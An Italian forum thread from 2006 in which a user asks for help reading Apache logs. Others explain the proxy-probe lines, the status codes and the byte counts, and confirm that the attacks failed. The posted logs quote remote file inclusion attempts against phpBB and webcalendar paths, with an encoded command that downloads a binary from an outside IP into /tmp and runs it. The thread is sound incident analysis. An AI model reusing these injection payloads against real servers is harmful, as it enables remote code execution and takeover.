spero di non aver toppato sezione :)

"analizzando" i log del mio pseudo-server apache ho trovato un paio di righe che mi hanno lasciato un po perplesso,
dalle ricerche fatte con san google, credo di aver capito che ci è stato qualcuno che ha tentato di "scannerizzare" il mio server alla ricerca di un proxy da usare.....

ma il dubbio piu grande, sono i numeri in fondo alla riga 200 e 19 il 200 sembra che stia per un "OK" ma il 19?

qui vi posto la riga:

****** - - [16/Mar/2006:14:45:14 +0100] "POST http://******:6667/ HTTP/1.0" 200 19
****** - - [16/Mar/2006:14:45:14 +0100] "CONNECT ******:6667 HTTP/1.0" 200 19

intanto gli ip li ho nascosti, ma dal ping risulta essere un server irc....

quello che vi chiedo è questo:

1. un link o manuale in cui venga spiegato i numeri finali delle righe (200... 19 ... 404 (pagina non trovata credo) etc etc..)
2. in particolare, il 200 e il 19 finale cosa significano?
3. mi devo preoccupare?



P.S.: sul mio server non è installato nessun proxy server

grazie

samu

Ciao,

forse hai maggiori possibilità di ottenere risposte nella sezione "programmazione" dove hanno più confidenza con Apache et similia :p

****** - - [16/Mar/2006:14:45:14 +0100] "POST http://******:6667/ HTTP/1.0" 200 19
****** - - [16/Mar/2006:14:45:14 +0100] "CONNECT ******:6667 HTTP/1.0" 200 19

mmmmhh....è strana come richiesta... Ed è strana anche la risposta sulla TUA porta 6667 (prova a fare telnet 127.0.0.1 6667, ti si connette ?), 19 è la quantità di byte trasferiti con quella richiesta...
Nota che la porta 6667 è quella standard dei server irc...

guardano i file di log del mio apache invece trovo molte richieste sulle seguenti porte
6995 (tantissime)
330
518

chie vuol dire?

@cionci

ho fatto quel che hai detto, connessione rifiutata


@wgator
ti mando un pm, una cosa che ho notato nei log

@tutti gli altri

ho questa fila di log, sembra che qualcuno voglia bucarmi (o lo ha già fatto :) )


213.191.133.20 - - [17/Mar/2006:12:01:45 +0100] "GET /webcalendar/tools/send_reminders.php?includedir=http://
83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTT
P/1.1" 404 317
213.191.133.20 - - [17/Mar/2006:12:01:47 +0100] "GET /webcalendar/send_reminders.php?includedir=http://83.16.
187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1"
404 311
213.191.133.20 - - [17/Mar/2006:12:01:48 +0100] "GET /webcalendar/tools/send_reminders.phpsend_reminders.php?
includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;ech
o%20YYY;echo| HTTP/1.1" 404 335
213.191.133.20 - - [17/Mar/2006:12:01:49 +0100] "GET /modules/PNphpBB2/includes/functions_admin.phpfunctions_
admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20ha
ita;./haita;echo%20YYY;echo| HTTP/1.1" 404 345
213.191.133.20 - - [17/Mar/2006:12:01:50 +0100] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_roo
t_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20
YYY;echo| HTTP/1.1" 404 326
213.191.133.20 - - [17/Mar/2006:12:01:51 +0100] "GET /modules/includes/functions_admin.php?phpbb_root_path=ht
tp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo|
HTTP/1.1" 404 317
213.191.133.20 - - [17/Mar/2006:12:01:52 +0100] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=h
ttp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo
| HTTP/1.1" 404 318
213.191.133.20 - - [17/Mar/2006:12:01:54 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=h
ttp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo
| HTTP/1.1" 404 318
213.191.133.20 - - [17/Mar/2006:12:01:55 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83
.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/
1.1" 404 310
213.191.133.20 - - [17/Mar/2006:12:01:56 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83
.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/
1.1" 404 310
213.191.133.20 - - [17/Mar/2006:12:01:57 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.18
7.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 4
04 304

che ne dite?

questa volta ho lasciato gli ip...


ho un forum per quello installato, ma non è phpbb infatti, l'errore 404 dato dai log significa che non han trovato na mazza sul mio server
o no?

analizzando meglio il log ho trovato anche

CONNECT XXXXXXXXXXXX:25 HTTP/1.0" 500 663

questo secondo voi potrebbe essere un tentativo di attacco.

leggendo meglio i log sembra che volevano usarmi per accedere ad altro server...

non mi sembra che ci siano riusciti, anche perchè le cose che cercavano, io non le ho installate (non tutte almeno, e cmq non con un nome che hanno usato)

ho un forum per quello installato, ma non è phpbb infatti, l'errore 404 dato dai log significa che non han trovato na mazza sul mio server
o no?


esatto. stava cercando di sfruttare qualche vulnerabilità di phpbb.

Sì, quello era un tentativo di usarti per scaricare qualcosa...ma non ci sono riusciti...

è sempre utile avere un web server vuoto :)

scherzo,

lo è in parte :)


cmq, ancora non riesco a capire i due log che ho postato nel primo messaggio...

in rete non trovo nulla :(

mi sa che sono stato preso di mira da qualche lamer uff

intanto ho scitto ai 2 isp (asiatici entrambi) servizio abusi, spero che risolvano o che invitino i clienti a controllare i loro log ogni tanto e di prendere le dovute precauzioni...

ho pure scritto ad un terzo (tedesco) sembra che un network scanner cercasse vulnerabilità
ecco parte del log andato male cmq

w00tw00t.at.ISC.SANS.DFind: